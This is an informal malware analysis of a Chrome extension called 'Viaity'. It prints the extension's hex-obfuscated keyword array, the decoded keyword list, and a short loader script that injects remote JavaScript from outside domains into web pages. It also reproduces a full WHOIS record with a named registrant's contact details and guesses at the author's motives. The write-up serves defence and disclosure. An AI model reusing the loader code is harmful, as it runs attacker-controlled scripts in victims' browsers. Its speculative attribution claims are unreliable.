Viaity is a JavaScript malware (Chrome Extension)
#jw8tzr\dppzfzixq.js While reading dppzfzixq.js i found this suspicious array which obviously the array that contains the most used keywords
var G = ['\x73\x63\x72\x69\x70\x74',
'\x6c\x61\x6e\x67\x75\x61\x67\x65',
'\x52\x64\x72',
'\x68\x74\x74\x70\x73\x3a',
'',
'\x61\x32\x78\x68\x63\x33\x52\x6c\x63\x6e\x4d\x75\x65\x48\x6c\x36\x4c\x7a\x41\x77\x4d\x6a\x49\x75\x61\x6e\x4d\x3d',
'\x61\x78\x6d\x56\x55',
'\x47\x67\x69\x35\x44\x58\x30',
'\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64',
'\x6c\x6f\x63\x61\x74\x69\x6f\x6e',
'\x2f\x2f',
'\x6e\x79\x74\x69\x6d\x65\x73\x2e\x63\x6f\x6d',
'\x69\x6e\x64\x65\x78\x4f\x66',
'\x64\x72\x69\x76\x65\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d',
'\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74',
'\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d',
'\x72\x65\x70\x6c\x61\x63\x65',
'\x68\x6f\x73\x74\x6e\x61\x6d\x65',
'\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d',
'\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74',
'\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d',
'\x6d\x61\x69\x6c\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d',
'\x50\x38\x45\x37',
'\x46',
'\x74\x79\x70\x65',
'\x48\x65',
'\x46\x54\x32\x73\x68\x32\x31',
'\x68\x65\x61\x64',
'\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74',
'\x73\x72\x63'];After Decoding The array here are the found keywords
Script
language
Rdr
https
:a2xhc3RlcnMueHl6LzAwMjIuanM=
axmVU
Ggi5DX0
appendChild
location
//
nytimes.com
indexOf
drive.google.com
text/javascript
facebook.com
replace
hostname
google.com
createElement
accounts.google.com
mail.google.com
P8E7
F
type
He
FT2sh21
head
javascript
src
facebook.com, google.com, accounts.google.com, mail.google.com, drive.google.com, and nytimes.com!!
Okay now it seems like he wanna steal some information from my google and facebook accounts but why nytimes.com maybe he wanna hit their server with a DDos maybe. So interesting huh! Spcially the base64 a2xhc3RlcnMueHl6LzAwMjIuanM= after decoding it, it's a JavaScript file associated with a domain which owned by the hacker. http://klasters.xyz/0022.js
0022.js file content.
(function () {
var scr = document.createElement('script');
scr.type = 'text/javascript';
scr.async = true;
scr.src = 'https://extstat.com/code/?pid=444202&r=' + Math.floor(10000000 * Math.random());
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(scr, s);
})();it seems like this malware is kinda botnet which executes 0022.js content this time it connects to https://extstat.com/code/ and i have no idea what is it maybe hits some ads to earn some money it's a guess next time he can change the content to something else who knows
WhoIs http://klasters.xyz
http://whois.domaintools.com/klasters.xyz
Domain Name: KLASTERS.XYZ
Domain ID: D32657463-CNIC
WHOIS Server: whois.reg.ru
Referral URL: https://www.reg.ru/
Updated Date: 2016-07-29T12:10:50.0Z
Creation Date: 2016-06-20T14:56:35.0Z
Registry Expiry Date: 2017-06-20T23:59:59.0Z
Sponsoring Registrar: Registrar of Domain Names REG.RU, LLC
Sponsoring Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant ID: C71037363-CNIC
Registrant Name: Stela Diacon
Registrant Organization: Cash Makers LP
Registrant Street: Suite 2,5 St. Vincent Street
Registrant City: Edinburgh
Registrant State/Province: Edinburgh
Registrant Postal Code: EH3 6SW
Registrant Country: GB
Registrant Phone: +380.947109131
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: [email protected]
Admin ID: C71037367-CNIC
Admin Name: Stela Diacon
Admin Organization: Cash Makers LP
Admin Street: Suite 2,5 St. Vincent Street
Admin City: Edinburgh
Admin State/Province: Edinburgh
Admin Postal Code: EH3 6SW
Admin Country: GB
Admin Phone: +380.947109131
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: [email protected]
Tech ID: C71037375-CNIC
Tech Name: Stela Diacon
Tech Organization: Cash Makers LP
Tech Street: Suite 2,5 St. Vincent Street
Tech City: Edinburgh
Tech State/Province: Edinburgh
Tech Postal Code: EH3 6SW
Tech Country: GB
Tech Phone: +380.947109131
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: [email protected]
Name Server: NS1.REG.RU
Name Server: NS2.REG.RU
DNSSEC: unsigned
Billing ID: C71037371-CNIC
Billing Name: Stela Diacon
Billing Organization: Cash Makers LP
Billing Street: Suite 2,5 St. Vincent Street
Billing City: Edinburgh
Billing State/Province: Edinburgh
Billing Postal Code: EH3 6SW
Billing Country: GB
Billing Phone: +380.947109131
Billing Phone Ext:
Billing Fax:
Billing Fax Ext:
Billing Email: [email protected]
Mother Russia!!!!.
More and More!! The email [email protected] is associated with other 18 domains!! and the company name associated with 21 domain!!
http://reversewhois.domaintools.com/?email=4ac46717409d6bec5ffebebdc48183a1